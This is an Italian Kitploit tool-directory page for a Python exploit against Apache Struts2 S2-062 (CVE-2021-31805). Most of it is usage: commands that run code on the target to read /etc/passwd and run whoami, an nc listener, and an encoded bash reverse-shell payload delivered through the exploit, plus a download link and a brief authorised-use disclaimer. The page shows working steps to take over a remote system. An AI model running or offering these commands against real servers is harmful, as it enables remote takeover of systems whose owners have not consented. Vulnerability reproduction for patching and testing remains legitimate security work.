Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Struts2_S2-062_CVE-2021-31805 — Python exploit per Apache Struts2 S2-062 (CVE-2021-31805) per l'esecuzione remota di codice, con ambiente di riproduzione basato su Docker e generazione di payload per reverse shell. | Kitploit
Strumenti/GitHubGitHub/secnn/struts2_s2-062_cve-2021-31805
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubsecnn/struts2_s2-062_cve-2021-31805

Struts2_S2-062_CVE-2021-31805

Python exploit per Apache Struts2 S2-062 (CVE-2021-31805) per l'esecuzione remota di codice, con ambiente di riproduzione basato su Docker e generazione di payload per reverse shell.

Vedi Repository
1154 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Struts2_S2-062_CVE-2021-31805

Apache Struts2 S2-062 Vulnerabilità di esecuzione remota di codice (CVE-2021-31805) | Reverse Shell

Ambiente di riproduzione della vulnerabilità

docker-compose.yml

root@kitploit:~
version: '2'
services:
 struts2:
   image: vulhub/struts2:2.5.25
   ports:
    - "8080:8080"

Estrai l'immagine e avvia l'ambiente

root@kitploit:~
docker-compose up -d

Indirizzo di accesso: http://1.1.1.1:8080

Script di verifica della vulnerabilità

root@kitploit:~
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action "cat /etc/passwd"

passwd

root@kitploit:~
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action whoami

root

root@kitploit:~
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action id

id

Reverse Shell

NC in ascolto sulla porta

root@kitploit:~
nc -lvvp 8081

NC

Costruisci lo script di reverse shell codificato in base64, utilizzando il seguente sito web: https://ir0ny.top/pentest/reverse-encoder-shell.html base64

Ottenere la Shell

root@kitploit:~
python CVE-2021-31805_Shell.py http://1.1.1.1:8080/index.action "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODA4MCAwPiYx}|{base64,-d}|{bash,-i}"

shell

Shell ottenuta con successo

Shell_code

Disclaimer

Non utilizzare per scopi illegali, solo per test di sicurezza, altrimenti le conseguenze non sono correlate a questo progetto. Nota: testare i siti web solo con autorizzazione legittima: testare siti in modo non regolamentare, lacrime per i propri cari.

Scarica lo strumento